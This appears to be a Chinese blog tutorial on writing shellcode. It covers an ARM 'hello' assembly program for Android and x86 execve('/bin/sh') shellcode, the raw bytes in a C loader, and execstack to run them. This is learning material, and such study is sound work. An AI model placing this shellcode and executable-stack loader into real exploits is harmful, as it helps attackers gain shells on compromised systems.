- 使用 windows SDK 内的 as.exe ld.exe 命令,生成可执行文件,然后导入到手机内测试
E:\task\dirtycow\androidtest>E:\andorid\android-ndk-r10e\toolchains\arm-linux-an droideabi-4.8\prebuilt\windows-x86_64\arm-linux-androideabi\bin\as.exe -o .\main test.o .\maintest.s
E:\task\dirtycow\androidtest>E:\andorid\android-ndk-r10e\toolchains\arm-linux-an droideabi-4.8\prebuilt\windows-x86_64\arm-linux-androideabi\bin\ld.exe -o .\main test .\maintest.o
http://blog.csdn.net/lwanttowin/article/details/78639763 arm 汇编编写详细 1
http://blog.csdn.net/lwanttowin/article/details/78640252 2
.section .text // 输出 helloworld
.global _start
_start:
# _write()
mov r2, #16 //size
adr r1, ascii //void* buf
mov r0, #0x1 //fd
mov r7, #0x4 //syscall addr
svc 0
# _exit()
sub r0, r0, r0
mov r7, $0x1
svc 0
ascii:
.string "hello shell\n"
.balign 4
然后将 main 导入到手机,执行
- x86 shellcode 编写
section .text
bits 32
global _start
_start:
jmp short GotoCall
shellcode:
pop esi
xor eax, eax
mov ecx, eax
mov edx, eax
mov byte al, 0x0b
mov ebx, esi
int 0x80
GotoCall:
call shellcode
db '/bin/sh'
编译成 x86 32 位:
~/upx_test/shellcode$ nasm -f elf oncemm.asm // 编译为 .o 文件
~/upx_test/shellcode$ ld -m elf_i386 -s -o oncemm oncemm.o // 生成 32 位的可执行文件
~/upx_test/shellcode$ objdump -d oncemm // 查看段二进制
#include <stdio.h>
char sc[]="\xeb\x0d\x5e\x31\xc0\x89\xc1\x89\xc2\xb0\x0b\x89\xf3\xcd\x80\xe8\xee\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
int main() {
void (*fp) (void) = (void (*)(void))sc;
// printf("--length: %u /n", strlen(shellcode));
// fp=(void *)shellcode;
fp();
}
~/upx_test/shellcode$ gcc -o main main.c // 生成可执行文件 main
~/upx_test/shellcode$ sudo apt-get install execstack // 安装 execstack
~/upx_test/shellcode$ execstack -s main // 搞一下
~/upx_test/shellcode$ ./main // 然后就看到了效果
参考:
https://bbs.ichunqiu.com/thread-23863-1-1.html?from=beef
http://blog.csdn.net/qq_29343201/article/details/52209935
网友评论